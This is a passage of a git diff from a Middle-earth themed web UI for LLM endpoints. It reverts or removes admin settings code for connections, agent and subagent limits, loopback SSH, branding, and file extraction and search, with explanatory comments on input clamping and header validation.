# and a strip of grey beside it -- and a manifest screenshot is the one
|
||||
# picture of this application most people will ever see.
|
||||
with Image.open(outdir / slug) as shot:
|
||||
shot.crop((0, 0, width, height)).save(target)
|
||||
print(f"wrote {target.relative_to(REPO)}")
|
||||
|
||||
|
||||
def main() -> None:
|
||||
if not CHROMIUM:
|
||||
raise SystemExit("no chromium")
|
||||
|
||||
if "--manifest-screenshots" in sys.argv:
|
||||
outdir = Path(sys.argv[1]) if len(sys.argv) > 2 else Path(tempfile.mkdtemp())
|
||||
outdir.mkdir(parents=True, exist_ok=True)
|
||||
manifest_screenshots(build_client(), outdir)
|
||||
return
|
||||
outdir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("/tmp/lembas-shoot/out")
|
||||
outdir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
paths = sys.argv[2].split(",") if len(sys.argv) > 2 else ["/chat", "/settings"]
|
||||
sizes = [(390, 844), (360, 640), (1280, 800)]
|
||||
themes = ["moria", "shire"]
|
||||
|
||||
client = build_client()
|
||||
results = []
|
||||
for path in paths:
|
||||
for width, height in sizes:
|
||||
for theme in themes:
|
||||
results.append(shoot(client, path, width, height, theme, outdir))
|
||||
|
||||
(outdir / "results.json").write_text(json.dumps(results, indent=2))
|
||||
for r in results:
|
||||
flags = []
|
||||
if r["documentScrolls"]:
|
||||
flags.append(f"DOC-SCROLLS({r['docScrollH']}>{r['innerH']})")
|
||||
if r["scrollsSideways"]:
|
||||
flags.append(f"SIDEWAYS({r['docScrollW']}>{r['innerW']})")
|
||||
if r["overflowCount"]:
|
||||
flags.append(f"overflow:{r['overflowCount']}")
|
||||
if r["smallCount"]:
|
||||
flags.append(f"small-targets:{r['smallCount']}")
|
||||
print(f"{r['page']:44} {' '.join(flags) or 'clean'}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -1,3 +1,3 @@
|
||||
"""LLeMbas - a Middle-earth themed web UI for OpenAI-compatible LLM endpoints."""
|
||||
|
||||
__version__ = "1.4.0"
|
||||
__version__ = "0.6.2"
|
||||
|
||||
+2
-40
@@ -3,7 +3,6 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import re
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
|
||||
@@ -56,10 +55,10 @@ async def general_page(request: Request, db: Db, user: AdminUser, saved: bool =
|
||||
async def save_general(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
instance_name: str = Form("LLeMbas"),
|
||||
allow_signup: bool = Form(False),
|
||||
system_prompt: str = Form(""),
|
||||
compact_threshold: int = Form(95),
|
||||
max_chat_rounds: int = Form(5),
|
||||
) -> Response:
|
||||
"""Save instance settings.
|
||||
|
||||
@@ -69,6 +68,7 @@ async def save_general(
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
"instance_name": instance_name.strip()[:120] or "LLeMbas",
|
||||
"allow_signup": allow_signup,
|
||||
"system_prompt": system_prompt.strip()[:8000],
|
||||
# 0 is "never"; anything else is clamped into a band where it can
|
||||
@@ -77,9 +77,6 @@ async def save_general(
|
||||
"compact_threshold": (
|
||||
0 if compact_threshold <= 0 else min(max(compact_threshold, 50), 99)
|
||||
),
|
||||
# Floor of 0, not 1: zero is how "no ceiling" is said, and the loop
|
||||
# falls back to a runaway backstop rather than to this number.
|
||||
"max_chat_rounds": min(max(max_chat_rounds, 0), 100),
|
||||
},
|
||||
)
|
||||
log.info("registration %s by %s", "opened" if allow_signup else "closed", user.email)
|
||||
@@ -104,25 +101,6 @@ async def connections_page(request: Request, db: Db, user: AdminUser, message: s
|
||||
)
|
||||
|
||||
|
||||
# Header names are a narrow set on purpose: a newline would let one field write
|
||||
# a second header, and a colon in a name splits it. Anything outside it is
|
||||
# dropped rather than repaired -- a header nobody can see the effect of is worse
|
||||
# than one that is visibly missing.
|
||||
_HEADER_NAME = re.compile(r"^[A-Za-z0-9!#$%&'*+.^_`|~-]{1,64}$")
|
||||
|
||||
|
||||
def _parse_headers(raw: str) -> dict[str, str]:
|
||||
"""`Name: value` per line, into the dict the client sends verbatim."""
|
||||
headers: dict[str, str] = {}
|
||||
for line in (raw or "").splitlines()[:20]:
|
||||
name, _, value = line.partition(":")
|
||||
name = name.strip()
|
||||
value = value.strip()[:500]
|
||||
if name and value and _HEADER_NAME.match(name):
|
||||
headers[name] = value
|
||||
return headers
|
||||
|
||||
|
||||
@router.post("/connections")
|
||||
async def create_connection(
|
||||
db: Db,
|
||||
@@ -163,27 +141,11 @@ async def update_connection(
|
||||
base_url: str = Form(...),
|
||||
api_key: str = Form(""),
|
||||
enabled: bool = Form(False),
|
||||
unload_url: str = Form(""),
|
||||
unload_method: str = Form("POST"),
|
||||
extra_headers: str = Form(""),
|
||||
) -> Response:
|
||||
connection = _connection(db, connection_id)
|
||||
connection.name = name.strip()[:120] or connection.name
|
||||
connection.base_url = base_url.strip().rstrip("/")
|
||||
connection.enabled = enabled
|
||||
# How to ask this endpoint to drop its model, for image generation's
|
||||
# Preserve VRAM. Empty means it cannot be unloaded, which is the honest
|
||||
# answer for anything not running on the machine ComfyUI is on.
|
||||
connection.unload_url = unload_url.strip()[:500]
|
||||
method = unload_method.strip().upper()
|
||||
connection.unload_method = method if method in ("GET", "POST") else "POST"
|
||||
|
||||
# `extra_headers_json` has been sent with every request to this endpoint
|
||||
# since it was added and written by no form in the application, so its one
|
||||
# documented use -- OpenRouter wants an `HTTP-Referer` and an `X-Title` --
|
||||
# was unreachable. One `Name: value` per line, because a JSON textarea asks
|
||||
# somebody to get braces right in a settings screen.
|
||||
connection.extra_headers_json = _parse_headers(extra_headers)
|
||||
|
||||
submitted = api_key.strip()
|
||||
if submitted and submitted != UNCHANGED_SENTINEL:
|
||||
|
||||
@@ -19,7 +19,7 @@ from sqlalchemy import func, select
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.db.models import SshProfile
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.agent import hosts, policy
|
||||
from lembas.services.agent import policy
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
from lembas.services.agent import terminal as terminal_service
|
||||
from lembas.web.templating import render
|
||||
@@ -48,83 +48,22 @@ async def agents_page(request: Request, db: Db, user: AdminUser, saved: bool = F
|
||||
"profile_count": db.scalar(select(func.count()).select_from(SshProfile)) or 0,
|
||||
"terminal_count": terminal_service.count(),
|
||||
"modes": [(m, policy.MODE_LABELS[m], policy.MODE_HINTS[m]) for m in policy.MODES],
|
||||
"loopback_modes": [
|
||||
(m, hosts.MODE_LABELS[m], hosts.MODE_HINTS[m]) for m in hosts.MODES
|
||||
],
|
||||
# How many of this instance's connections the current position would
|
||||
# stop. The number is the point of the card: "3 connections" beside
|
||||
# a switch somebody is about to move is the difference between an
|
||||
# informed change and a surprise.
|
||||
"loopback_count": sum(
|
||||
1
|
||||
for p in db.scalars(select(SshProfile))
|
||||
if hosts.is_loopback(p.host) or p.resolves_here
|
||||
),
|
||||
# A group of its own, saved by its own form. Subagents are not an
|
||||
# agent-chat feature -- an ordinary chat can delegate too -- but
|
||||
# this is the page somebody looks at when they want to know what a
|
||||
# reply is allowed to set going on its own, and a nav entry for one
|
||||
# card would be worse than the near-miss.
|
||||
"subagents": settings_store.subagents(db),
|
||||
"saved": saved,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.post("/subagents")
|
||||
async def save_subagents(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
enabled: bool = Form(False),
|
||||
max_per_reply: int = Form(4),
|
||||
max_concurrent: int = Form(6),
|
||||
max_rounds: int = Form(30),
|
||||
wall_seconds: int = Form(600),
|
||||
max_completion_tokens: int = Form(60_000),
|
||||
keep_transcript: bool = Form(False),
|
||||
) -> Response:
|
||||
"""Its own route because it is its own settings group.
|
||||
|
||||
A single form writing two groups would mean one save handler deciding which
|
||||
key each field belongs to, which is a mapping that goes wrong silently. Two
|
||||
forms, two keys, and the browser posts only the one that was submitted.
|
||||
"""
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
"enabled": enabled,
|
||||
# Clamped here as well as on read, for the reason the agent settings
|
||||
# give: a number with no bound is a way to break the instance from a
|
||||
# form. Zero is kept only for the token ceiling, where it means "no
|
||||
# ceiling"; everywhere else a zero would be the feature switched off
|
||||
# wearing the switch's clothes.
|
||||
"max_per_reply": min(max(max_per_reply, 1), 20),
|
||||
"max_concurrent": min(max(max_concurrent, 1), 50),
|
||||
"max_rounds": min(max(max_rounds, 1), 200),
|
||||
"wall_seconds": min(max(wall_seconds, 30), 7200),
|
||||
"max_completion_tokens": min(max(max_completion_tokens, 0), 5_000_000),
|
||||
"keep_transcript": keep_transcript,
|
||||
},
|
||||
key=settings_store.SUBAGENTS,
|
||||
)
|
||||
log.info("subagents %s by %s", "enabled" if enabled else "disabled", user.email)
|
||||
return RedirectResponse("/admin/agents?saved=1", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
@router.post("")
|
||||
async def save_agents(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
enabled: bool = Form(False),
|
||||
loopback: str = Form("off"),
|
||||
loopback_port: int = Form(0),
|
||||
default_timeout: int = Form(60),
|
||||
max_timeout: int = Form(600),
|
||||
max_output_bytes: int = Form(64 * 1024),
|
||||
max_steps: int = Form(200),
|
||||
max_steps: int = Form(40),
|
||||
max_wall_seconds: int = Form(900),
|
||||
max_total_output_bytes: int = Form(1024 * 1024),
|
||||
max_completion_tokens: int = Form(200_000),
|
||||
approval_timeout: int = Form(900),
|
||||
allow_default: str = Form(""),
|
||||
deny_default: str = Form(""),
|
||||
@@ -136,36 +75,20 @@ async def save_agents(
|
||||
terminal_integration: bool = Form(False),
|
||||
index_enabled: bool = Form(False),
|
||||
index_chars: int = Form(2000),
|
||||
instructions_enabled: bool = Form(False),
|
||||
instructions_chars: int = Form(4000),
|
||||
nudge_unfinished: bool = Form(False),
|
||||
background_enabled: bool = Form(False),
|
||||
background_on_timeout: bool = Form(False),
|
||||
background_notify: bool = Form(False),
|
||||
background_max_jobs: int = Form(5),
|
||||
) -> Response:
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
"enabled": enabled,
|
||||
# Anything unrecognised means off, here as well as on read: the one
|
||||
# direction safe to get wrong is refusing a connection somebody has
|
||||
# to re-allow, and the other is a shell on this host.
|
||||
"loopback": loopback if loopback in hosts.MODES else hosts.MODE_OFF,
|
||||
# Zero means "none named", which is what `port` needs in order to
|
||||
# refuse rather than to allow. 22 is refused wherever it is stored.
|
||||
"loopback_port": loopback_port if 1 <= loopback_port <= 65535 else 0,
|
||||
# Clamped here as well as on read. A number with no bound is a way
|
||||
# to break the instance from a form, which is the same reasoning
|
||||
# the search settings carry.
|
||||
"default_timeout": min(max(default_timeout, 1), 3600),
|
||||
"max_timeout": min(max(max_timeout, 1), 3600),
|
||||
"max_output_bytes": min(max(max_output_bytes, 1024), 1024 * 1024),
|
||||
"max_steps": min(max(max_steps, 1), 1000),
|
||||
"max_steps": min(max(max_steps, 1), 200),
|
||||
"max_wall_seconds": min(max(max_wall_seconds, 30), 7200),
|
||||
"max_total_output_bytes": min(max(max_total_output_bytes, 4096), 8 * 1024 * 1024),
|
||||
# Floor of 0, not 1: zero is how "no ceiling" is said.
|
||||
"max_completion_tokens": min(max(max_completion_tokens, 0), 5_000_000),
|
||||
"approval_timeout": min(max(approval_timeout, 60), 3600),
|
||||
"allow_default": _lines(allow_default),
|
||||
"deny_default": _lines(deny_default),
|
||||
@@ -180,22 +103,8 @@ async def save_agents(
|
||||
# directory for the file picker but put none of it in the
|
||||
# prompt", which nothing else can say.
|
||||
"index_chars": min(max(index_chars, 0), 20_000),
|
||||
"instructions_enabled": instructions_enabled,
|
||||
"instructions_chars": min(max(instructions_chars, 0), 20_000),
|
||||
"nudge_unfinished": nudge_unfinished,
|
||||
"background_enabled": background_enabled,
|
||||
"background_on_timeout": background_on_timeout,
|
||||
"background_notify": background_notify,
|
||||
"background_max_jobs": min(max(background_max_jobs, 1), 100),
|
||||
},
|
||||
key=settings_store.AGENTS,
|
||||
)
|
||||
log.info("agent execution %s by %s", "enabled" if enabled else "disabled", user.email)
|
||||
if loopback != hosts.MODE_OFF:
|
||||
log.warning(
|
||||
"ssh connections to this machine allowed (%s%s) by %s",
|
||||
loopback,
|
||||
f", port {loopback_port}" if loopback == hosts.MODE_PORT else "",
|
||||
user.email,
|
||||
)
|
||||
return RedirectResponse("/admin/agents?saved=1", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
@@ -1,225 +0,0 @@
|
||||
"""Making an instance somebody else's.
|
||||
|
||||
One page, four cards, one settings group. Everything it writes goes through
|
||||
`branding.stored_only`, so a field left at its shipped wording is never written
|
||||
down and a later release can still improve it — the prompt-fragment rule, and
|
||||
the reason this page can afford to render every flavour string as an editable
|
||||
box without freezing all of them the first time somebody presses Save.
|
||||
|
||||
`branding.forget()` after every write, and this is the only module that calls
|
||||
it. The snapshot is a process-level cache read by a Jinja global; a save that
|
||||
did not drop it would take effect on the next restart, which is the shape of
|
||||
failure this codebase keeps cataloguing.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, File, Form, Request, Response, UploadFile, status
|
||||
from fastapi.responses import RedirectResponse
|
||||
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.services import branding as branding_service
|
||||
from lembas.services import settings_store, uploads
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/admin/customization", tags=["admin-branding"])
|
||||
|
||||
MAX_CUSTOM_CSS = 40_000
|
||||
|
||||
# How many custom themes an instance may keep. Not a design limit -- there is
|
||||
# nothing in `theme_css` that cares -- but the whole set lives in one settings
|
||||
# row read into a process-level snapshot on every render, and the page offers a
|
||||
# blank block whenever there is room, so *some* number has to say when to stop
|
||||
# offering. Twelve is far past what anybody wants and small enough that the
|
||||
# stylesheet stays a stylesheet.
|
||||
MAX_THEMES = 12
|
||||
|
||||
|
||||
def _page(request: Request, db: Db, saved: str = "", error: str = "") -> Response:
|
||||
values = settings_store.get_group(db, branding_service.BRANDING)
|
||||
brand = branding_service.for_db(db)
|
||||
return render(
|
||||
request,
|
||||
"admin/customization.html",
|
||||
{
|
||||
"values": values,
|
||||
"current": brand,
|
||||
# The flavour table drives the form, so a string added in code
|
||||
# appears here with its default in the box and no template change.
|
||||
"flavour": [
|
||||
{
|
||||
"key": key,
|
||||
"label": label,
|
||||
"hint": hint,
|
||||
"default": default,
|
||||
"value": str(values.get(f"text_{key}") or ""),
|
||||
}
|
||||
for key, (label, hint, default) in branding_service.FLAVOUR.items()
|
||||
],
|
||||
"tokens": branding_service.THEME_TOKENS,
|
||||
"custom_themes": [t for t in brand.themes if not t.built_in],
|
||||
"bases": [name for name, _, _ in branding_service.BUILT_IN],
|
||||
"max_themes": MAX_THEMES,
|
||||
"saved": saved,
|
||||
"error": error,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("")
|
||||
async def customization_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
|
||||
return _page(request, db, saved=saved)
|
||||
|
||||
|
||||
def _write(db: Db, changes: dict) -> None:
|
||||
"""Store a change and drop the cache, in that order and always together."""
|
||||
settings_store.update(db, changes, key=branding_service.BRANDING)
|
||||
branding_service.forget()
|
||||
|
||||
|
||||
@router.post("/identity")
|
||||
async def save_identity(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
instance_name: str = Form(""),
|
||||
tagline: str = Form(""),
|
||||
logo: UploadFile | None = File(None),
|
||||
favicon: UploadFile | None = File(None),
|
||||
remove_logo: bool = Form(False),
|
||||
remove_favicon: bool = Form(False),
|
||||
) -> Response:
|
||||
stored = settings_store.get_group(db, branding_service.BRANDING)
|
||||
changes: dict = {
|
||||
"instance_name": instance_name.strip()[:120],
|
||||
"tagline": tagline.strip()[:200],
|
||||
}
|
||||
|
||||
if remove_logo:
|
||||
for name in (stored.get("logo_path"), *(stored.get("icon_paths") or {}).values()):
|
||||
uploads.delete_branding_image(str(name or ""))
|
||||
changes["logo_path"] = ""
|
||||
changes["icon_paths"] = {}
|
||||
if remove_favicon:
|
||||
uploads.delete_branding_image(str(stored.get("favicon_path") or ""))
|
||||
changes["favicon_path"] = ""
|
||||
|
||||
try:
|
||||
if logo is not None and logo.filename:
|
||||
payload = await logo.read()
|
||||
changes["logo_path"] = uploads.save_branding_image(payload, logo.content_type or "")
|
||||
# Derived here rather than on demand: a launcher asks for a 512px
|
||||
# PNG and will not scale one itself, and doing it per request would
|
||||
# mean resizing an image on the path that serves it.
|
||||
changes["icon_paths"] = uploads.derive_icons(payload)
|
||||
if favicon is not None and favicon.filename:
|
||||
payload = await favicon.read()
|
||||
changes["favicon_path"] = uploads.save_branding_image(
|
||||
payload, favicon.content_type or ""
|
||||
)
|
||||
except uploads.UploadError as exc:
|
||||
return _page(request, db, error=str(exc))
|
||||
|
||||
_write(db, branding_service.stored_only(changes))
|
||||
log.info("branding identity changed by %s", user.email)
|
||||
return RedirectResponse(
|
||||
"/admin/customization?saved=Identity+saved.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/flavour")
|
||||
async def save_flavour(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""The Middle-earth strings.
|
||||
|
||||
Read from the raw form rather than declared as parameters, because the set
|
||||
is `branding.FLAVOUR` and a parameter list would be a second copy of it that
|
||||
goes stale the first time a string is added. A key that was not submitted is
|
||||
left alone; one submitted empty falls back to its default, which is what
|
||||
makes "clear the box" mean "give me the shipped wording back" rather than
|
||||
"show nothing here".
|
||||
"""
|
||||
form = await request.form()
|
||||
changes = {
|
||||
f"text_{key}": str(form.get(f"text_{key}") or "").strip()[:400]
|
||||
for key in branding_service.FLAVOUR
|
||||
if f"text_{key}" in form
|
||||
}
|
||||
_write(db, branding_service.stored_only(changes))
|
||||
return RedirectResponse(
|
||||
"/admin/customization?saved=Wording+saved.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/css")
|
||||
async def save_css(db: Db, user: AdminUser, custom_css: str = Form("")) -> Response:
|
||||
_write(db, {"custom_css": custom_css.strip()[:MAX_CUSTOM_CSS]})
|
||||
log.info("custom CSS changed by %s", user.email)
|
||||
return RedirectResponse(
|
||||
"/admin/customization?saved=Stylesheet+saved.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/themes")
|
||||
async def save_themes(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""Every custom theme, replaced wholesale.
|
||||
|
||||
One form for the lot rather than a row each, because a theme is a handful of
|
||||
colours and the whole set fits on a screen — and because replacing the list
|
||||
means a theme removed here is gone, with no reconciliation between what was
|
||||
posted and what was stored.
|
||||
|
||||
Nothing is validated here beyond shape. `branding._theme_from` validates on
|
||||
every **read**, so a theme written straight into the settings table by hand,
|
||||
or stored by an earlier version, still has to produce a stylesheet that
|
||||
parses. Validating only on save would put that guarantee in the wrong place.
|
||||
|
||||
The indices need not be contiguous and are not renumbered. The page renders
|
||||
one block per theme plus a blank one, so clearing an id in the middle leaves
|
||||
a gap -- and a gap is simply an index with no id, which the loop already
|
||||
skips. Renumbering would be work in aid of nothing.
|
||||
"""
|
||||
form = await request.form()
|
||||
themes = []
|
||||
for index in range(_theme_count(form)):
|
||||
theme_id = str(form.get(f"theme_{index}_id") or "").strip().lower()
|
||||
if not theme_id:
|
||||
continue
|
||||
themes.append(
|
||||
{
|
||||
"id": theme_id,
|
||||
"label": str(form.get(f"theme_{index}_label") or "").strip(),
|
||||
"base": str(form.get(f"theme_{index}_base") or "moria"),
|
||||
"tokens": {
|
||||
name: value
|
||||
for name, _ in branding_service.THEME_TOKENS
|
||||
if (value := str(form.get(f"theme_{index}_{name}") or "").strip())
|
||||
},
|
||||
}
|
||||
)
|
||||
# Enforced here as well as in the template, because the template's job is to
|
||||
# stop offering and this one's is to stop accepting -- a crafted POST is not
|
||||
# the page.
|
||||
themes = themes[:MAX_THEMES]
|
||||
_write(db, {"themes": themes})
|
||||
log.info("%d custom theme(s) saved by %s", len(themes), user.email)
|
||||
return RedirectResponse(
|
||||
"/admin/customization?saved=Themes+saved.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
def _theme_count(form) -> int:
|
||||
"""How many theme blocks the form carried.
|
||||
|
||||
Counted from the submitted keys rather than from a hidden field, so a form
|
||||
rendered by an older page still saves what it holds.
|
||||
"""
|
||||
indices = [
|
||||
int(key.split("_")[1])
|
||||
for key in form
|
||||
if key.startswith("theme_") and key.split("_")[1].isdigit()
|
||||
]
|
||||
return max(indices) + 1 if indices else 0
|
||||
@@ -1,200 +0,0 @@
|
||||
"""What happens to a file between the upload and the model, and how it is found.
|
||||
|
||||
Two halves on one page because they are two ends of the same pipeline: what gets
|
||||
extracted decides what there is to search, and the search settings decide what
|
||||
becomes of it. Splitting them would mean an administrator setting a 300-page PDF
|
||||
limit on one screen and wondering on another why half a book is missing from the
|
||||
index.
|
||||
|
||||
Every save drops `files.forget()`, and this is the only module that calls it —
|
||||
the same discipline `admin_branding` has with the branding snapshot, and for the
|
||||
same reason: a process-level cache whose save does not drop it is a setting that
|
||||
takes effect at the next restart.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Form, Request, Response, status
|
||||
from fastapi.responses import RedirectResponse
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.db.models import Connection, Model
|
||||
from lembas.services import files as files_service
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.library import indexing
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/admin/extraction", tags=["admin-extraction"])
|
||||
|
||||
|
||||
def _embedding_models(db: Db) -> list[Model]:
|
||||
"""Models an administrator has marked as producing embeddings.
|
||||
|
||||
Filtered rather than listed in full, the same shape `/admin/images` uses for
|
||||
its reviewer: a chat model in this picker is a setting that looks configured
|
||||
and fails on the first request, which is the shape of failure this codebase
|
||||
keeps cataloguing.
|
||||
"""
|
||||
return [
|
||||
model
|
||||
for model in db.scalars(
|
||||
select(Model).join(Connection).order_by(Model.position, Model.model_id)
|
||||
)
|
||||
if (model.capabilities_json or {}).get("embeddings")
|
||||
]
|
||||
|
||||
|
||||
def _lines(text: str) -> list[str]:
|
||||
return [line.strip() for line in (text or "").splitlines() if line.strip()]
|
||||
|
||||
|
||||
@router.get("")
|
||||
async def extraction_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
|
||||
values = settings_store.extraction(db)
|
||||
models = _embedding_models(db)
|
||||
return render(
|
||||
request,
|
||||
"admin/extraction.html",
|
||||
{
|
||||
"values": values,
|
||||
"extensions_text": "\n".join(values.get("extra_text_extensions") or []),
|
||||
"models": models,
|
||||
# A model that was chosen and has since lost its flag, or its
|
||||
# connection. Named rather than silently dropped from the picker:
|
||||
# a setting that vanishes is one nobody can tell from one that was
|
||||
# never made.
|
||||
"missing_model": (
|
||||
values["embedding_model_id"]
|
||||
if values["embedding_model_id"]
|
||||
and values["embedding_model_id"] not in {m.model_id for m in models}
|
||||
else ""
|
||||
),
|
||||
"ready": indexing.enabled(db),
|
||||
"counts": indexing.counts(db),
|
||||
"progress": indexing.progress(),
|
||||
"saved": saved,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.post("")
|
||||
async def save_extraction(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
max_upload_mb: int = Form(20),
|
||||
max_image_edge: int = Form(1400),
|
||||
jpeg_quality: int = Form(85),
|
||||
max_pdf_pages: int = Form(300),
|
||||
max_extracted_chars: int = Form(120_000),
|
||||
orphan_hours: int = Form(24),
|
||||
extra_text_extensions: str = Form(""),
|
||||
reject_unreadable_pdf: bool = Form(False),
|
||||
) -> Response:
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
# Clamped here as well as on read, for the reason the agent settings
|
||||
# give: a number with no bound is a way to break the instance from
|
||||
# a form.
|
||||
"max_upload_mb": min(max(max_upload_mb, 1), 512),
|
||||
"max_image_edge": min(max(max_image_edge, 128), 8192),
|
||||
"jpeg_quality": min(max(jpeg_quality, 30), 100),
|
||||
"max_pdf_pages": min(max(max_pdf_pages, 1), 5000),
|
||||
"max_extracted_chars": min(max(max_extracted_chars, 1000), 5_000_000),
|
||||
"orphan_hours": min(max(orphan_hours, 1), 8760),
|
||||
"extra_text_extensions": _lines(extra_text_extensions),
|
||||
"reject_unreadable_pdf": reject_unreadable_pdf,
|
||||
},
|
||||
key=settings_store.EXTRACTION,
|
||||
)
|
||||
files_service.forget()
|
||||
log.info("extraction settings changed by %s", user.email)
|
||||
return RedirectResponse(
|
||||
"/admin/extraction?saved=Extraction+saved.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/search")
|
||||
async def save_search(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
embedding_model_id: str = Form(""),
|
||||
chunk_chars: int = Form(1200),
|
||||
chunk_overlap: int = Form(150),
|
||||
embed_batch: int = Form(16),
|
||||
) -> Response:
|
||||
"""The semantic half.
|
||||
|
||||
Its own form and its own route, because the two halves have different
|
||||
consequences: changing a chunk size invalidates every vector already stored,
|
||||
and changing an upload limit does not. Keeping them apart is what lets the
|
||||
page say so beside the control that does it.
|
||||
"""
|
||||
before = settings_store.extraction(db)
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
"embedding_model_id": embedding_model_id.strip()[:300],
|
||||
"chunk_chars": min(max(chunk_chars, 200), 8000),
|
||||
"chunk_overlap": max(chunk_overlap, 0),
|
||||
"embed_batch": min(max(embed_batch, 1), 256),
|
||||
},
|
||||
key=settings_store.EXTRACTION,
|
||||
)
|
||||
files_service.forget()
|
||||
|
||||
# Changing the model changes the vector space, so what is stored stops
|
||||
# meaning anything against a new query. Nothing is deleted -- the scorer
|
||||
# already skips a width that does not match the query's, so a stale index is
|
||||
# ignored rather than trusted -- but a rebuild is what makes it useful
|
||||
# again, and offering it here is cheaper than leaving somebody to notice.
|
||||
changed = before["embedding_model_id"] != embedding_model_id.strip()
|
||||
message = "Search+saved."
|
||||
if changed and embedding_model_id.strip():
|
||||
message = "Search+saved.+Rebuild+the+index+to+use+the+new+model."
|
||||
log.info("embedding model set to %r by %s", embedding_model_id, user.email)
|
||||
return RedirectResponse(
|
||||
f"/admin/extraction?saved={message}", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/rebuild")
|
||||
async def rebuild(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""Start a rebuild, and answer with the progress card.
|
||||
|
||||
A background task rather than a request that waits: embedding a library of a
|
||||
few thousand records is minutes of HTTP round trips, and a page that hangs
|
||||
for that long is one somebody reloads, which starts a second one.
|
||||
"""
|
||||
started = indexing.start_rebuild()
|
||||
if started:
|
||||
log.info("index rebuild started by %s", user.email)
|
||||
return render(
|
||||
request,
|
||||
"admin/_index_progress.html",
|
||||
{"progress": indexing.progress(), "counts": indexing.counts(db), "ready": True},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/progress")
|
||||
async def rebuild_progress(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""Polled while a rebuild runs. Stops polling itself when it finishes.
|
||||
|
||||
Polled rather than streamed for the reason `/api/chats/unread` is: this is
|
||||
one small fragment on one page, and an SSE stream for it would be a second
|
||||
streaming path to keep correct.
|
||||
"""
|
||||
return render(
|
||||
request,
|
||||
"admin/_index_progress.html",
|
||||
{
|
||||
"progress": indexing.progress(),
|
||||
"counts": indexing.counts(db),
|
||||
"ready": indexing.enabled(db),
|
||||
},
|
||||
)
|
||||
@@ -1,462 +0,0 @@
|
||||
"""Image generation administration: the ComfyUI, and the workflows to run on it.
|
||||
|
||||
Two shapes on one nav entry, because they are two different kinds of thing. The
|
||||
connection, the checkpoints and the switches are instance settings and get a
|
||||
settings page. A workflow is an authored document with a name, a description and
|
||||
a body, so the workflows are list-plus-detail -- the shape the working notes require
|
||||
of any admin list, and for the reason it gives: a page that renders a ten-line
|
||||
JSON textarea per row is unusable at three rows.
|
||||
|
||||
Route order matters and is not alphabetical. `/admin/images/workflows/new` is
|
||||
registered before `/admin/images/workflows/{workflow_id}`, or "new" is captured
|
||||
as an id and 404s. That has already been a bug twice here.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import re
|
||||
from datetime import UTC, datetime
|
||||
from typing import Any
|
||||
|
||||
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
|
||||
from fastapi.responses import RedirectResponse
|
||||
from sqlalchemy import func, select
|
||||
|
||||
from lembas.api.deps import AdminUser, Db
|
||||
from lembas.db.models import ImageWorkflow, Model
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.crypto import UNCHANGED_SENTINEL, decrypt, keep_or_replace, mask
|
||||
from lembas.services.images import comfy
|
||||
from lembas.services.images import workflow as workflow_service
|
||||
from lembas.services.llm.openai_client import LLMError
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/admin/images", tags=["admin-images"])
|
||||
|
||||
SLUG_PATTERN = re.compile(r"^[a-z0-9][a-z0-9_-]{0,47}$")
|
||||
|
||||
